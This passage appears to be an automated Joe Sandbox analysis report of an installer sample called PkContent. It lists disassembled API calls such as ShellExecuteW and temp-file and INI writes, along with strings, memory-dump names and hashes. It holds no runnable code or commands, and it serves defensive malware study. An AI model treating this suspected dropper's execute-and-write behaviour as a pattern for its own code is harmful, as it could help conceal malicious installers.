                                                • TravelersDevelopingImpactsJewsInstructorOriginal, xrefs: 00402770
                                                • <RM>, xrefs: 00402713
                                                • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                • String ID: <RM>$TravelersDevelopingImpactsJewsInstructorOriginal$WriteINIStr: wrote [%s] %s=%s in %s
                                                • API String ID: 247603264-163489428
                                                • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                Control-flow Graph

                                                control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                APIs
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                • API String ID: 3156913733-2180253247
                                                • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405E9D
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: nsa
                                                • API String ID: 1716503409-2209301699
                                                • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                • String ID: HideWindow
                                                • API String ID: 1249568736-780306582
                                                • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                APIs
                                                • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID:
                                                • API String ID: 3394109436-0
                                                • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                APIs
